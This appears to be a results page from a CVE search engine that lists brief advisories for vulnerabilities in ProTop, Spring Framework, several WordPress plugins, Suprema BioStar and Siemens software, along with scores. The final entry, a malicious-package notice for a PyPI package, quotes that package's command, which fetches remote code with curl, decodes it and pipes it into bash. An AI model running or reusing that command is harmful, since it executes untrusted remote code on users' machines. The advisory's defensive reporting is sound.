CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1292 matches found

White Star Software ProTop - Directory Traversal

A directory traversal vulnerability was discovered in White Star Software Protop version 4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely read arbitrary files on the underlying OS using encoded traversal sequences. id: CVE-2025-44177 info: name:...

8.2CVSS7.5AI score0.04173EPSS

Exploits3References4

CVE•added 2026/06/09 3:50 a.m.•41 views

CVE-2026-41844

The CVE-2026-41844 entry concerns Spring Framework components Spring MVC and Spring WebFlux. Affected are Spring Framework versions 7.0.0–7.0.7; 6.2.0–6.2.18; 6.1.0–6.1.27; and 5.3.0–5.3.48. Description: when an application configures a mapping for "/**" and the view name is not explicitly specif...

6.1CVSS5.6AI score0.00134EPSS

Exploits0References1Affected Software1

RedhatCVE•added 2026/06/05 7:46 p.m.•7 views

CVE-2026-42670

Missing Authorization vulnerability in Etoile Web Design Incorporated Five Star Restaurant Reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Five Star Restaurant Reservations: from n/a through 2.7.14...

7.5CVSS5.4AI score0.00252EPSS

Exploits0References1

RedhatCVE•added 2026/06/05 7:43 p.m.•8 views

CVE-2026-8432

Concrete CMS 9 before 9.5.0 is vulnerable to Cross Site Request Forgery CSRF at concrete/controllers/backend/file star. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Dror...

8.8CVSS5.5AI score0.0013EPSS

Exploits0References1

RedhatCVE•added 2026/06/05 7:40 p.m.•7 views

CVE-2025-40745

A vulnerability has been identified in Siemens Software Center All versions V3.5.8.2, Simcenter 3D All versions V2506.6000, Simcenter Femap All versions V2506.0002, Simcenter STAR-CCM+ All versions V2602, Solid Edge SE2025 All versions V225.0 Update 13, Solid Edge SE2026 All versions V226.0 Updat...

6.3CVSS5.4AI score0.00137EPSS

Exploits0References1

RedhatCVE•added 2026/06/05 7:32 p.m.•8 views

CVE-2026-6864

The CBX 5 Star Rating & Review plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...

6.1CVSS5.7AI score0.00264EPSS

Exploits0References1

RedhatCVE•added 2026/06/05 7:28 p.m.•7 views

CVE-2026-4301

The Rate Star Review Vote - AJAX Reviews, Votes, Star Ratings plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.6.4. The vwrsrreview AJAX handler lacks both capability checks and nonce verification. The only access control is an isuserloggedin check...

4.3CVSS5.5AI score0.00271EPSS

Exploits0References1

NVD•added 2026/06/02 12:16 p.m.•13 views

CVE-2026-42670

7.5CVSS0.00252EPSS

Exploits0References1

CVE•added 2026/06/02 10:41 a.m.•17 views

CVE-2026-42670

CVE-2026-42670 concerns the WordPress plugin for Five Star Restaurant Reservations (versions

7.5CVSS5.8AI score0.00252EPSS

Exploits0References1

Cvelist•added 2026/06/02 10:41 a.m.•36 views

CVE-2026-42670 WordPress Five Star Restaurant Reservations plugin <= 2.7.14 - Payment Bypass vulnerability

0.00252EPSS

Exploits0References1

EUVD•added 2026/06/02 10:41 a.m.•11 views

EUVD-2026-33908

7.5CVSS5.8AI score0.00252EPSS

Exploits0References1

CNNVD•added 2026/06/02 12:0 a.m.•4 views

WordPress plugin Five Star Restaurant Reservations 安全漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. There is...

7.5CVSS5.5AI score0.00252EPSS

Exploits0References1

Positive Technologies•added 2026/06/02 12:0 a.m.•9 views

PT-2026-45734

5.8AI score0.00252EPSS

Exploits0References2

CVE•added 2026/05/29 12:11 p.m.•26 views

CVE-2026-9509

CVE-2026-9509 affects Suprema BioStar 2 Server (versions 2.9.8, 2.9.10, 2.9.11). An unhandled exception triggered by unauthenticated HTTP POST requests to the /api/migration endpoint can cause a denial of service, halting critical processes and leaving the system offline until services or the ser...

8.7CVSS5.9AI score0.00351EPSS

Exploits0References1

CNNVD•added 2026/05/29 12:0 a.m.•9 views

Suprema BioStar 安全漏洞

Suprema BioStar is a web-based, open-integrated security platform developed by the South Korean company Suprema. It offers comprehensive features for access control, attendance management, visitor management, and video log maintenance. Versions 2.9.8, 2.9.10, and 2.9.11 of Suprema BioStar contain...

8.7CVSS5.8AI score0.00351EPSS

Exploits0References1

OSSF Malicious Packages•added 2026/05/26 10:43 a.m.•13 views

Malicious code in m-at-star-tools (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...

6.2AI score

Exploits0References2